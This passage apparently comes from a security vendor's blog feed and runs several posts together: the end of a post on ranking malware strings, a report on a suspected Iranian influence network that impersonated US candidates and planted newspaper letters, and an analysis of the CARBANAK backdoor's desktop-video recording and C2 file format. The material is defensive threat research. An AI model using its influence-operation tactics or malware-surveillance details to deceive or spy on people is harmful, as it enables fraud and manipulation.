  • “N” is for normalized, which means dividing DCG scores by ideal DCG scores calculated for a ground truth holdout dataset, which we obtain from FLARE-identified relevant strings contained within historical malware reports. Normalization makes it possible to compare scores across samples since the number of strings within different Strings outputs can vary widely.
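Putting those four letters together, NDCG@k can be computed directly from the relevance labels of the strings in the order the model ranked them. The snippet below is an independent worked example of the definition, not FireEye’s evaluation code.

```python
import math

def dcg_at_k(relevances, k):
    # Each relevance gain is discounted by log2 of its 1-based rank plus one.
    return sum(rel / math.log2(i + 2) for i, rel in enumerate(relevances[:k]))

def ndcg_at_k(relevances_in_predicted_order, k=100):
    # Normalize by the DCG of the ideal, descending-relevance ordering.
    ideal = sorted(relevances_in_predicted_order, reverse=True)
    ideal_dcg = dcg_at_k(ideal, k)
    return dcg_at_k(relevances_in_predicted_order, k) / ideal_dcg if ideal_dcg else 0.0

# Ground-truth labels of six strings, listed in the model's predicted order:
print(round(ndcg_at_k([7, 6, 0, 5, 0, 1], k=100), 3))
```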


Figure 4: Kernel Density Estimate of NDCG@100 scores for Strings outputs from the holdout dataset. Scores are calculated for the original ordering after simply running the Strings program on each binary (gray) versus the predicted ordering from the trained GBDT model (red).

In practice, we take the first k strings indexed by their ranks within a single Strings output, where the k parameter is chosen based on how many strings a malware analyst will attend to or deem relevant on average. For our purposes we set k = 100 based on the approximate average number of relevant strings per Strings output. NDCG@k scores are bounded between 0 and 1, with scores closer to 1 indicating better prediction quality in which more relevant strings surface towards the top. This measurement allows us to evaluate the predictions from a given model versus those generated by other models and ranked with different algorithms.

To quantitatively assess model performance, we run the strings from each sample that has a corresponding ground truth FLARE report through the predict() step of Figure 2, and compare their predicted ranks with a baseline of the original ranking of strings output by Strings. The divergence in distributions of NDCG@100 scores between these two approaches demonstrates that the trained GBDT model learns a useful structure that generalizes well to the independent holdout set (Figure 4).

Conclusion

In this blog post, we introduced an ML model that learns to rank strings based on their relevance for malware analysis. Our results illustrate that it can rank Strings output based both on qualitative inspection (Figure 3) and quantitative evaluation of NDCG@k (Figure 4). Since Strings is so commonly applied during malware analysis at FireEye and elsewhere, this model could significantly reduce the overall time required to investigate suspected malicious binaries at scale. We plan on continuing to improve its NDCG@k scores by training it with more high fidelity labeled data, incorporating more sophisticated modeling and featurization techniques, and soliciting further analyst feedback from field testing.

It’s well known that malware authors go to great lengths to conceal useful strings from analysts, and a potential blind spot to consider for this model is that the utility of Strings itself can be thwarted by obfuscation. However, open source tools like the FireEye Labs Obfuscated String Solver (FLOSS) can be used as an in-line replacement for Strings. FLOSS automatically extracts printable strings just as Strings does, but additionally reveals obfuscated strings that have been encoded, packed, or manually constructed on the stack. The model can be readily trained on FLOSS outputs to rank even obfuscated strings. Furthermore, since it can be applied to arbitrary lists of strings, the model could also be used to rank strings extracted from live memory dumps and sandbox runs.

This work represents a collaboration between the FDS and FLARE teams, which together build predictive models to help find evil and improve outcomes for FireEye’s customers and products. If you are interested in this mission, please consider joining the team by applying to one of our job openings.

Network of Social Media Accounts Impersonates U.S. Political Candidates, Leverages U.S. and Israeli Media in Support of Iranian Interests

In August 2018, FireEye Threat Intelligence released a report exposing what we assessed to be an Iranian influence operation leveraging networks of inauthentic news sites and social media accounts aimed at audiences around the world. We identified inauthentic social media accounts posing as everyday Americans that were used to promote content from inauthentic news sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front. We also noted a then-recent shift in branding for some accounts that had previously self-affiliated with LFP; in July 2018, the accounts dropped their LFP branding and adopted personas aligned with progressive political movements in the U.S. Since then, we have continued to investigate and report on the operation to our intelligence customers, detailing the activity of dozens of additional sites and hundreds of additional social media accounts.

Recently, we investigated a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation and that we assess with low confidence was organized in support of Iranian political interests. In addition to utilizing fake American personas that espoused both progressive and conservative political stances, some accounts impersonated real American individuals, including a handful of Republican political candidates that ran for House of Representatives seats in 2018. Personas in this network have also had material published in U.S. and Israeli media outlets, attempted to lobby journalists to cover specific topics, and appear to have orchestrated audio and video interviews with U.S. and UK-based individuals on political issues. While we have not at this time tied these accounts to the broader influence operation we identified last year, they promoted material in line with Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin. Most of the accounts in the network appear to have been suspended on or around the evening of 9 May, 2019. Appendix 1 provides a sample of accounts in the network.

The Network

The accounts, most of which were created between April 2018 and March 2019, used profile pictures appropriated from various online sources, including, but not limited to, photographs of individuals on social media with the same first names as the personas. As with some of the accounts that we identified to be of Iranian origin last August, some of these new accounts self-described as activists, correspondents, or “free journalist[s]” in their user descriptions. Some accounts posing as journalists claimed to belong to specific news organizations, although we have been unable to identify individuals belonging to those news organizations with those names.

Narratives promoted by these and other accounts in the network included anti-Saudi, anti-Israeli, and pro-Palestinian themes. Accounts expressed support for the Joint Comprehensive Plan of Action (JCPOA), commonly known as the Iran nuclear deal; opposition to the Trump administration’s designation of Iran’s Islamic Revolutionary Guard Corps (IRGC) as a Foreign Terrorist Organization; antipathy toward the Ministerial to Promote a Future of Peace and Security in the Middle East (a U.S.-led conference that focused on Iranian influence in the Middle East more commonly known as the February 2019 Warsaw Summit); and condemnation of U.S. President Trump’s veto of a resolution passed by Congress to end U.S. involvement in the Yemen conflict.


Figure 1: Sample tweets on the Trump administration’s designation of Iran’s IRGC as a Foreign Terrorist Organization

Interestingly, some accounts in the network also posted a small amount of messaging seemingly contradictory to their otherwise pro-Iran stances. For example, while one account’s tweets were almost entirely in line with Iranian political interests, including a tweet claiming that “iran has shown us that his nuclear program is peaceful [sic],” the account also posted a series of tweets directed at U.S. President Trump on Sept. 25, 2018, the same day that he gave a speech to the United Nations in which he excoriated the Iranian Government. The account called on Trump to attack Iran, using the hashtags #attack_Iran, #go_to_hell_Rouhani, #stop_sanctions, #UnitedNations, and #trump_speech; other accounts in the network, which likewise predominantly held pro-Iran stances, echoed these sentiments, using the same or similar hashtags. It is possible that these accounts were seeking to build an audience with views antipathetic to Iran that could then later be targeted with pro-Iranian messaging.

Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature. Subsequently in 2017, @AlexRyanNY claimed in a tweet to be “an Iranian who supported Hillary” in a tweet directed at a Democratic political strategist. This account, using the display name “Alex Ryan” and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex. We note that it is possible that the account was compromised from another individual or that it was merely repurposed by the same actor. Additionally, while most of the accounts in the network had their interface languages set to English, we observed that one account had its interface language set to Persian.

Impersonation of U.S. Political Candidates

Some Twitter accounts in the network impersonated Republican political candidates that ran for House of Representatives seats in the 2018 U.S. congressional midterms. These accounts appropriated the candidates’ photographs and, in some cases, plagiarized tweets from the real individuals’ accounts. Aside from impersonating real U.S. political candidates, the behavior and activity of these accounts resembled that of the others in the network.

For example, the account @livengood_marla impersonated Marla Livengood, a 2018 candidate for California’s 9th Congressional District, using a photograph of Livengood and a campaign banner for its profile and background pictures. The account began tweeting on Sept. 24, 2018, with its first tweet plagiarizing one from Livengood’s official account earlier that month:


Figure 2: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 1, 2018 (right)

The @livengood_marla account plagiarized a number of other tweets from Livengood’s official account, including some that referenced Livengood’s official account username:


Figure 3: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 3, 2018 (right)

The @livengood_marla account also tweeted various news snippets on both political and apolitical subjects, such as the confirmation of Brett Kavanaugh to the U.S. Supreme Court and the wedding of the UK’s Princess Eugenie and Jack Brooksbank, prior to segueing into promoting material more closely aligned with Iranian interests. For example, the account, along with others in the network, commemorated the United Nations’ International Day of the Girl Child with a photograph of emaciated children in Yemen, as well as narratives pertaining to the killing of Saudi journalist Jamal Khashoggi and Saudi Shiite child Zakaria al-Jaber, intended to portray Saudi Arabia in a negative light.

In another example, the account @ButlerJineea impersonated Jineea Butler, a 2018 candidate for New York’s 13th Congressional District, using a photograph of Butler for its profile picture and incorporating her campaign slogans into its background picture, as well as claiming in its Twitter bio to be a “US House candidate, NY-13” and linking to Butler’s website, jineeabutlerforcongress.com.


Figure 4: Suspect account @ButlerJineea (left); apparent legitimate, currently inactive account @Jineea4congress (right)

These and other accounts in the network plagiarized tweets from additional sources beyond the individuals they impersonated, including other U.S. politicians, about both political and apolitical topics.

Influence Activity Leveraged U.S. and Israeli Media

In addition to directly posting material on social media, we observed some personas in the network leverage legitimate print and online media outlets in the U.S. and Israel to promote Iranian interests via the submission of letters, guest columns, and blog posts that were then published. We also identified personas that we suspect were fabricated for the sole purpose of submitting such letters, but that do not appear to maintain accounts on social media. The personas claimed to be based in varying locations depending on the news outlets they were targeting for submission; for example, a persona that listed their location as Seattle, WA in a letter submitted to the Seattle Times subsequently claimed to be located in Baytown, TX in a letter submitted to The Baytown Sun. Other accounts in the network then posted links to some of these letters on social media.

The letters and columns, many of which were published in 2018 and 2019, but which date as far back as 2015, were mostly published in small, local U.S. news outlets; however, several larger outlets have also published material that we suspect was submitted by these personas (see Appendix 2). In at least two cases, the text of letters purportedly authored by different personas and published in different newspapers was identical or nearly identical, while in other instances, separate personas promoted the same narratives in letters published within several days of each other. The published material was not limited to letters; one persona, “John Turner,” maintained a blog on The Times of Israel website from January 2017 to November 2018, and wrote articles for the U.S.-based site Natural News Blogs from August 2015 to July 2018. The letters and articles primarily addressed themes or promoted stances in line with Iranian political interests, similar to the activity conducted on social media.


Figure 5: Sample letter published in Galveston County’s (Texas) The Daily News, authored by suspect persona Mathew O’Brien

We have thus far identified at least five suspicious personas that have had letters or other content published by legitimate news outlets. We surmise that additional personas exist, based on other investigatory leads.

“John Turner”: The John Turner persona has been active since at least 2015. Turner has claimed to be based, variously, in New York, NY, Seattle, WA, and Washington, DC. Turner described himself as a journalist in his Twitter profile, though has also claimed both to work at the Seattle Times and to be a student at Villanova University, claiming to be attending between 2015 and 2020. In addition to letters published in various news outlets, John Turner maintained a blog on The Times of Israel site in 2017 and 2018 and has written articles for Natural News Blogs. At least one of Turner’s letters was promoted in a tweet by another account in the network.

“Ed Sullivan”: The Ed Sullivan persona, which has on at least one occasion used the same headshot as that of John Turner, has had letters published in the Galveston County, Texas-based The Daily News, the New York Daily News, and the Los Angeles Times, including some letters identical in text to those authored by the “Jeremy Watte” persona (see below) published in the Texas-based outlet The Baytown Sun. Ed Sullivan has claimed his location to be, variously, Galveston and Newport News (Virginia).

“Mathew Obrien”: The Mathew Obrien persona, whose name has also been spelled “Matthew Obrien” and “Mathew O’Brien”, claimed in his Twitter bio to be a Newsday correspondent. The persona has had letters published in Galveston County’s The Daily News and the Athens, Texas-based Athens Daily Review; in those letters, his claimed locations were Galveston and Athens, respectively, while the persona’s Twitter account, @MathewObrien1, listed a location of New York, NY. At least one of Obrien’s letters was promoted in a tweet by another account in the network.

“Jeremy Watte”: Letters signed by the Jeremy Watte persona have been published in The Baytown Sun and the Seattle Times, where he claimed to be based in Baytown and Seattle, respectively. The texts of at least two letters signed by Jeremy Watte are identical to that in letters published in other newspapers under the name Ed Sullivan. At least one of his letters was promoted in a tweet by another account in the network.

“Isabelle Kingsly”: The Isabelle Kingsly persona claimed on her Twitter profile (@IsabelleKingsly) to be an “Iranian-American” based in Seattle, WA. Letters signed by Kingsly have appeared in The Baytown Sun and the Newport News Virginia local paper The Daily Press; in those letters, Kingsly’s location is listed as Galveston and Newport News, respectively. The @IsabelleKingsly Twitter account’s profile picture and other posted pictures were appropriated from a social media account of what appears to be a real individual with the same first name of Isabelle. At least one of Kingsly’s letters was promoted in a tweet by another account in the network.

Other Media Activity

Personas in the network also engaged in other media-related activity, including criticizing and soliciting mainstream media coverage, and conducting remote video and audio interviews with real U.S. and UK-based individuals while presenting themselves as journalists. At least one of those personas presented itself as working for a mainstream news outlet.

Criticism/Solicitation of Media Coverage

Accounts in the network directed tweets at mainstream media outlets, calling on them to provide coverage of topics aligned with Iranian interests or, alternatively, criticizing them for insufficient coverage of those topics. For example, we observed accounts criticizing media outlets over their lack of coverage of the killing of Shiite child Zakaria al-Jaber in Saudi Arabia, as well as Saudi Arabia’s conduct in the Yemen conflict. While such activity might have been intended to directly influence the media outlets’ reporting, the accounts may have also been aiming to reach a wider audience by tweeting at outlets with a large following that would see those replies.


Figure 6: Sample tweets by suspect accounts calling on mainstream media outlets to increase their coverage of alleged Saudi activity in the Yemen conflict

“Media” Interviews with Real U.S., UK-Based Individuals

Accounts in the network, under the guise of journalist personas, also solicited various individuals over Twitter for interviews and chats, including real journalists and politicians. The personas appear to have successfully conducted remote video and audio interviews with U.S. and UK-based individuals, including a prominent activist, a radio talk show host, and a former U.S. Government official, and subsequently posted the interviews on social media, showing only the individual being interviewed and not the interviewer. The interviewees expressed views that Iran would likely find favorable, discussing topics such as the February 2019 Warsaw summit, an attack on a military parade in the Iranian city of Ahvaz, and the killing of Jamal Khashoggi.

The provenance of these interviews appears to have been misrepresented on at least one occasion, with one persona appearing to have falsely claimed to be operating on behalf of a mainstream news outlet; a remote video interview with a U.S.-based activist about the Jamal Khashoggi killing was posted by an account adopting the persona of a journalist from the outlet Newsday, with the Newsday logo also appearing in the video. We did not identify any Newsday interview with the activist in question on this topic. In another instance, a persona posing as a journalist directed tweets containing audio of an interview conducted with a former U.S. Government official at real media personalities, calling on them to post about the interview.

Conclusion

We are continuing to investigate this and potentially related activity that may be being conducted by actors in support of Iranian interests. At this time, we are unable to provide further attribution for this activity, and we note the possibility that the activity could have been designed for alternative purposes or include some small percentage of authentic behavior. However, if it is of Iranian origin or supported by Iranian state actors, it would demonstrate that Iranian influence tactics extend well beyond the use of inauthentic news sites and fake social media personas, to also include the impersonation of real individuals on social media and the leveraging of legitimate Western news outlets to disseminate favorable messaging. If this activity is being conducted by the same or related actors as those responsible for the Liberty Front Press network of inauthentic news sites and affiliated social media accounts that we exposed in August 2018, it may also suggest that these actors remain undeterred by public exposure or by social media platforms’ shutdowns of their accounts, and that they continue to seek to influence audiences within the U.S. toward positions in line with Iranian political interests.

Appendices

Appendix 1: Sample Twitter accounts identified in this network, currently suspended.

| Username | Display Name | Bio | Creation Date | Location |
| --- | --- | --- | --- | --- |
| @MichaelA22444 | Michael Anderson | Free journalist #resist | 3/16/2019 | DC |
| @sammichelsn1995 | Sam Michelson | Journalist. In search of reality. 1995. Resistance. | 3/14/2019 | |
| @JasonCa26738291 | Jason Campbell | It’s our duty to leave our Country-to our children-better than we found it | 2/20/2019 | |
| @SaraMar44752473 | Sara Martin | | 1/24/2019 | |
| @LisaBro09759828 | Lisa Brown | | 1/24/2019 | |
| @Jennife67352965 | Jennifer Parker | I AM | 1/23/2019 | |
| @SusanSc25255529 | Susan Scott | Don't think too hard, just have fun with life... | 1/22/2019 | |
| @LindaJa02370118 | Linda Jackson | I drink lots of tea... | 1/22/2019 | |
| @MarkAda05568324 | Mark Adams | | 1/22/2019 | |
| @aliisseeeee | alliisse | Liberty | 1/21/2019 | New York |
| @morsi18 | morsi | | 1/13/2019 | |
| @AntiReality2 | Anti_Reality | Very angry mad at politicians In favor of sick minds | 1/9/2019 | North Carolina, USA |
| @JennyMick3 | Jenny Mick | Unemployment Widow mother of two | 1/9/2019 | Pennsylvania, USA |
| @JaneAnton9 | Jane Anton | Daughter of best parent. Do your best, just let your success shows your efforts. | 1/9/2019 | California, USA |
| @RabinAntonio | Antonio Rabin | Student at Harvard college. somehow into politics. I love gym | 1/9/2019 | |
| @Angelofhuman1 | Angel of human | I do into beauty and humanity | 12/26/2018 | California, USA |
| @AliciaHernan3 | Alicia Hernan | Wife, mom of tow sons, student, in favor of peace. | 12/26/2018 | New York, USA |
| @ThomasRace3 | Thomas Race | Bodybuilding sports and into Music and gym | 12/25/2018 | Michigan, USA |
| @EmmaWil14155495 | Emma Wilkerson | Student in college studying International law | 12/25/2018 | Sunnyvale, CA |
| @Kevin24798000 | Kevin | A free person from everywhere I'm somehow into politics | 12/15/2018 | New York, USA |
| @ImanRashedii | Iman Rashed | Correspondent at https://t.co/3hxSgtkuXh. 🎥📸Freelance Journalist. ➡️➡️oppose War and Brutality 💆‍♂️I was born in Beirut | 12/8/2018 | London |
| @emAnderson1996 | emily anderson | In search of peace. Really into politics and justice. Love US and other countries. | 10/6/2018 | New York, USA |
| @FordNaava | naava ford | | 10/2/2018 | |
| @MaazRoss | maaz ross | follow back | 9/30/2018 | |
| @sam86523055 | ResistSam | high educated free journalist in favor of politics in search of reality Middle East issues | 9/29/2018 | New York, USA |
| @ButlerJineea | Jineea Butler | US House candidate, NY-13 | 9/26/2018 | U.S. Congressional Candidate for NY District 13 serving Harlem, Washington Heights and Western Bronx.US |
| @TynioAnya | Anya Tynio | | 9/26/2018 | |
| @livengood_marla | Marla Livengood | | 9/23/2018 | |
| @Fall_Of_Amercia | Fall_of_Amercia | save the US | 9/8/2018 | Washington, DC |
| @IsabelleKingsly | Elizabeth Warren not for 2020 | Single. Iranian-American. Lifestyle.And a tad of politics. @ewarren not for 2020. | 9/8/2018 | Seattle, WA |
| @MathewObrien1 | Mathew Obrien | A single boy,@Newsday correspondent , interested in news Scientist🔬. Animal 🐘 and Nature lover🌲, hiker and backpacker♍ . | 6/21/2018 | New York, NY |
| @HumanBeingUSA | Human-Rights | The fight for human rights never sleeps, standing up for human rights across the world, wherever justice, freedom, fairness and truth are denied. | 6/14/2018 | New York, USA |
| @ashleyc57528342 | ashley cohen | follow me to get follow back | 6/14/2018 | Arizona, USA |
| @josefsanchezzzz | josef sanchez | | 6/10/2018 | |
| @GuillouJan | jan guillou | | 5/13/2018 | |
| @saidqutb2 | saidqutb | | 5/12/2018 | |
| @olegkashin4321 | rajat sharma | | 5/8/2018 | |
| @Suzan_Nicolson | Suzan Nicholson | follow me to get follow back | 5/8/2018 | Las Vegas, NV |
| @caroloffoff | diana culi | | 5/7/2018 | |
| @hairullomirsaid | guillem balague | | 5/7/2018 | |
| @habibayyoub1 | habib ayyoub | | 5/6/2018 | |
| @daphneposh | James Anderson | No Magats 🚫, 🔥 Anti War & Hate, Pro Equality, Humanity, Humor & Sensible Gun Reform | 4/30/2018 | New York, USA |
| @JohnHoward333 | John H.T | Journalist. RTs Are not necessarily endorsements. All views my own. #Resist | 5/12/2015 | Washington, USA |
| @AlexRyanNY | Alex Ryan | New Yorker, @Newsday correspondent. You don't have a soul. You are a Soul. You have a body. | 4/17/2011 | New York, USA |
Table 1: Sample Twitter accounts identified in this network

Appendix 2: Sample letters published in news outlets submitted by personas identified in this network, August 2018 to April 2019.

Date | Author | Author’s Listed Location | Newspaper

Aug. 1, 2018 | Jeremy Watte | Baytown | The Baytown Sun (baytownsun.com)
Title: “Trump’s wall just a vanity project”
The letter argues against the Trump administration’s proposed border wall with Mexico. The text of the letter is identical to that published in Galveston County’s The Daily News (galvnews.com) on Aug. 4, 2018, three days later.
http://baytownsun.com/opinion/article_85fa9df4-9527-11e8-9aa8-1bb745e7141a.html

Aug. 4, 2018 | Ed Sullivan | Galveston | Galveston County’s The Daily News (galvnews.com)
Title: “Trump cares not one wit about effects of shutdown”
The text of the letter is identical to that published in The Baytown Sun on Aug. 1.
https://www.galvnews.com/opinion/guest_columns/article_7d5b3e9b-cbdd-5ac8-8c91-3a1eb0da3df7.html

Oct. 11, 2018 | Jeremy Watte | Baytown | The Baytown Sun (baytownsun.com)
Title: “Time to fight for it”
The letter, written from the point of view of an individual aligned with the U.S. political left, calls on individuals to fight for justice.
http://baytownsun.com/opinion/article_915fde6c-ccf3-11e8-a085-33dce44563d1.html

Oct. 23, 2018 | Ed Sullivan | Newport News | New York Daily News (nydailynews.com)
Title: “Don’t shrug off Khashoggi’s murder”
The letter argues that “the most fitting and best memorial to Jamal Khashoggi,” a Saudi journalist who was murdered in the Saudi embassy in Istanbul, “would be the swift end to the war in Yemen.”
https://www.nydailynews.com/dp-edt-letswed-1024-story.html

Oct. 23, 2018 | Ed Sullivan | Newport News | Los Angeles Times (latimes.com)
Title: “Don’t shrug off Khashoggi’s murder”
The letter is identical to that published in the New York Daily News on the same day.
https://www.latimes.com/dp-edt-letswed-1024-story.html

Nov. 27, 2018 | John Turner | New York, NY | Times of Israel (blog.timesofisrael.com)
Title: “Saudi Arabia’s foreign policy is failing”
The letter states that the murder of Jamal Khashoggi is “the latest in a series of foreign policy blunders” committed by the Saudi Crown Prince Mohammed Bin Salman.
https://blogs.timesofisrael.com/saudi-arabias-foreign-policy-is-failing/

Nov. 30, 2018 | John Turner | New York, NY | Times of Israel (blog.timesofisrael.com)
Title: “Relations with Israel will not benefit Gulf states”
The letter argues that the Gulf states will not benefit from normalized relations with Israel, stating that “the Arab street” would not support those relations and that such a move would be risky for “the Gulf’s unelected rulers.”
https://blogs.timesofisrael.com/relations-with-israel-will-not-benefit-gulf-states/

Dec. 26, 2018 | Isabelle Kingsly | Galveston | The Baytown Sun (baytownsun.com)
Title: “Wild West sheriff”
The letter argues that Trump is not an aberration in U.S. history, but rather an ideological descendant of various U.S. historical currents; the article also calls him “an authoritarian, racist madman.”
http://baytownsun.com/opinion/letters/article_4ad26b8c-08bb-11e9-9056-3f5207ea4cf7.html

Jan. 18, 2019 | Jeremy Watte | Seattle | Seattle Times (seattletimes.com)
Title: “ISIS’ ideology not defeated”
The letter, written in response to an article about Americans killed by an ISIS suicide bomber in Syria, asserts that the Islamic extremist ideology espoused by the terrorist group remains undefeated.
https://www.seattletimes.com/opinion/letters-to-the-editor/isis-ideology-not-defeated/

March 1, 2019 | Jeremy Watte | Baytown | The Baytown Sun (baytownsun.com)
Title: “Sins of Saudi Arabia”
The letter is condemnatory of Saudi Arabia, citing its actions in the Yemen conflict, the killing of Jamal Khashoggi, the killing of Zakaria al-Jaber, a Shiite child, in Medina, and the imprisonment of Saudi women activists. The letter also defends Iran, stating that it is not responsible for similar crimes.
http://baytownsun.com/opinion/article_4c8f1d4e-3bce-11e9-a391-37761ca39ef2.html

April 9, 2019 | Mathew Obrien | Galveston | Galveston County’s The Daily News (galvnews.com)
Title: “Sanctioning Islamic corps is pure madness”
The letter condemns the Trump administration’s designation of the IRGC as a Foreign Terrorist Organization and claims that Trump is seeking to start a war with Iran.
https://www.galvnews.com/opinion/letters_to_editor/article_860e6c9b-1e22-5871-a1ea-d8d466fccc94.html

April 11, 2019 | Matthew Obrien | Athens | Athens Daily Review (athensreview.com)
Title: “Trump, Bolton trying to start war with Iran”
The letter, similar to the April 9 letter published in Galveston County’s The Daily News, claims that Trump and Bolton are trying to start a war with Iran to use the war in Trump’s 2020 presidential campaign, while disregarding the alleged crimes of Saudi Arabia.
https://www.athensreview.com/opinion/letters_to_the_editor/trump-bolton-trying-to-start-war-with-iran/article_e41a029e-5ca5-11e9-b59b-4f174bf94dcd.html

April 11, 2019 | Isabelle Kingsly | Newport News | Daily Press (dailypress.com)
Title: “An uneasy path – Re; Recent Iran sanction reports”
The letter also argues that Trump and Bolton are seeking to start a war with Iran toward political ends.
https://www.dailypress.com/news/opinion/letters/dp-edt-letsfri-0412-story.html

April 19, 2019 | Jeremy Watte | Baytown | The Baytown Sun (baytownsun.com)
Title: “Escalating hostility toward Iran”
The letter argues that the election of Trump to the U.S. presidency has set the U.S. on a dangerous course and condemns the U.S. withdrawal from the Iran nuclear deal (JCPOA), stating that “the ayatollahs have welcomed this abrogation of honor on Trump’s part.”
http://baytownsun.com/opinion/article_fd3f8bfa-6249-11e9-992a-d373a2b5a5a4.html

April 23, 2019 | Ed Sullivan | Galveston | Galveston County’s The Daily News (galvnews.com)
Title: “Escalating hostility toward Iran is wrong, dangerous”
The text of this letter is nearly identical to that authored by Jeremy Watte and published in The Baytown Sun on April 19, excepting changes made in several sentences.
https://www.galvnews.com/opinion/letters_to_editor/article_0409879b-fff9-5ab8-bbf5-a49a1c1592d9.html

Table 2: Sample letters published in news outlets submitted by personas in this network

CARBANAK Week Part Four: The CARBANAK Desktop Video Player

Part One, Part Two and Part Three of CARBANAK Week are behind us. In this final blog post, we dive into one of the more interesting tools that is part of the CARBANAK toolset. The CARBANAK authors wrote their own video player and we happened to come across an interesting video capture from CARBANAK of a network operator preparing for an offensive engagement. Can we replay it?

About the Video Player

The CARBANAK backdoor is capable of recording video of the victim’s desktop. Attackers reportedly viewed recorded desktop videos to gain an understanding of the operational workflow of employees working at targeted banks, allowing them to successfully insert fraudulent transactions that remained undetected by the banks’ verification processes. As mentioned in a previous blog post announcing the arrest of several FIN7 members, the video data file format and the player used to view the videos appeared to be custom written. The video player, shown in Figure 1, and the C2 server for the bots were designed to work together as a pair.


Figure 1: CARBANAK desktop video player

The C2 server wraps video stream data received from a CARBANAK bot in a custom video file format that the video player understands, and writes these video files to a location on disk based on a convention assumed by the video player. The StreamVideo constructor shown in Figure 2 creates a new video file that will be populated with the video capture data received from a CARBANAK bot, prepending a header that includes the signature TAG, timestamp data, and the IP address of the infected host. This code is part of the C2 server project.


Figure 2: carbanak\server\Server\Stream.cs – Code snippet from the C2 server that serializes video data to file

Figure 3 shows the LoadVideo function that is part of the video player project. It validates the file type by looking for the TAG signature, then reads the timestamp values and IP address just as they were written by the C2 server code in Figure 2.


Figure 3: carbanak\server\Player\Video.cs – Player code that loads a video file created by the C2 server
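For readers who want to experiment with the format, a rough Python approximation of that loading logic is shown below. The field widths and ordering are assumptions made for illustration; the authoritative layout lives in the C2 server’s Stream.cs and the player’s Video.cs.

```python
import struct

def read_frm_header(path):
    """Illustrative reader for a CARBANAK .frm video file header.

    The field sizes and ordering are assumptions for demonstration only;
    the real format is defined by StreamVideo (Stream.cs) and LoadVideo
    (Video.cs).
    """
    with open(path, "rb") as f:
        if f.read(3) != b"TAG":
            raise ValueError("missing TAG signature: not a CARBANAK video file")
        # Assumed layout: begin/end timestamps as 64-bit tick counts, then
        # the infected host's IPv4 address.
        begin_ticks, end_ticks = struct.unpack("<qq", f.read(16))
        ip = ".".join(str(b) for b in f.read(4))
        return {"begin_ticks": begin_ticks, "end_ticks": end_ticks, "ip": ip}
```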

Video files have the extension .frm as shown in Figure 4 and Figure 5. The C2 server’s CreateStreamVideo function shown in Figure 4 formats a file path following a convention defined in the MakeStreamFileName function, and then calls the StreamVideo constructor from Figure 2.


Figure 4: carbanak\server\Server\RecordFromBot.cs – Function in the C2 server that formats a video file name and adds the extension "frm"

The video player code snippet shown in Figure 5 follows the same video file path convention, searching all video file directories for files with the extension .frm whose begin and end timestamps fall within the range of the DateTime variable dt.


Figure 5: carbanak\server\Player\Video.cs – Snippet from Player code that searches for video files with "frm" extension
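A simplified stand-in for that search, reusing read_frm_header from the previous sketch, is shown below; as before, the exact matching rule is an assumption based on the description of the player’s behavior.

```python
import pathlib

def find_videos(video_dirs, range_start_ticks, range_end_ticks):
    """Collect .frm files whose begin and end timestamps fall within the
    requested range. A simplified stand-in for the search in Video.cs."""
    matches = []
    for directory in video_dirs:
        for path in pathlib.Path(directory).glob("*.frm"):
            header = read_frm_header(path)
            if range_start_ticks <= header["begin_ticks"] and header["end_ticks"] <= range_end_ticks:
                matches.append(path)
    return matches
```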

An Interesting Video

We came across several video files, but only some were compatible with this video player. After some analysis, we discovered that there are at least two different versions of the video file format: one stores compressed video data and the other stores it raw. After some slight adjustments to the video processing code, both formats are now supported and we can play all of the videos.

Figure 6 shows an image from one of these videos in which the person being watched appears to be testing post-exploitation commands and ensuring they remain undetected by certain security monitoring tools.


Figure 6: Screenshot of video playback captured by CARBANAK video capability

The list of commands in the figure centers around persistence, screenshot creation, and launching various payloads. Red teamers often maintain such generic notes and command snippets for accomplishing various tasks like persistence, escalation, and lateral movement. An extreme example of this is Ben Clark’s book RTFM. In advance of an operation, it is customary to tailor the file names, registry value names, directories, and other parameters to afford better cover and prevent blue teams from drawing inferences based on methodology. Furthermore, Windows behavior sometimes yields surprises, such as value length limitations, unexpected interactions between payloads and specific persistence mechanisms, and so on. It is in the interest of the attacker to perform a dry run and ensure that unanticipated issues do not jeopardize the access that was gained.

The person being monitored via CARBANAK in this video appears to be a network operator preparing for attack. This could either be because the operator was testing CARBANAK, or because they were being monitored. The CARBANAK builder and other interfaces are never shown, and the operator is seen preparing several publicly available tools and tactics. While purely speculation, it is possible that this was an employee of the front company Combi Security which we now know was operated by FIN7 to recruit potentially unwitting operators. Furthermore, it could be the case that FIN7 used CARBANAK’s tinymet command to spawn Meterpreter instances and give unwitting operators access to targets using publicly available tools under the false premise of a penetration test.

Conclusion

This final installment concludes our four-part series, lovingly dubbed CARBANAK Week. To recap, we have shared at length many details concerning our experience as reverse engineers who, after spending dozens of hours reverse engineering a large, complex family of malware, happened upon the source code and toolset for the malware. This is something that rarely ever happens!

We hope this week’s lengthy addendum to FireEye’s continued CARBANAK research has been interesting and helpful to the broader security community in examining the functionalities of the framework and some of the design considerations that went into its development.

So far we have received lots of positive feedback about our discovery of the source code and our recent exposé of the CARBANAK ecosystem. It is worth highlighting that much of what we discussed in CARBANAK Week was originally covered in our Cyber Defense Summit 2018 presentation titled “Hello, Carbanak!”, which is freely available to watch online (a must-see for malware and lederhosen enthusiasts alike). You can expect similar topics and an electrifying array of other malware analysis, incident response, forensic investigation and threat intelligence discussions at FireEye’s upcoming Cyber Defense Summit 2019, held Oct. 7 to Oct. 10, 2019, in Washington, D.C.

CARBANAK Week Part Three: Behind the CARBANAK Backdoor

We covered a lot of ground in Part One and Part Two of our CARBANAK Week blog series. Now let's take a look back at some of our previous analysis and see how it holds up.

In June 2017, we published a blog post sharing novel information about the CARBANAK backdoor, including technical details, intel analysis, and some interesting deductions about its operations we formed from the results of automating analysis of hundreds of CARBANAK samples. Some of these deductions were claims about the toolset and build practices for CARBANAK. Now that we have a snapshot of the source code and toolset, we also have a unique opportunity to revisit these deductions and shine a new light on them.

Was There a Build Tool?

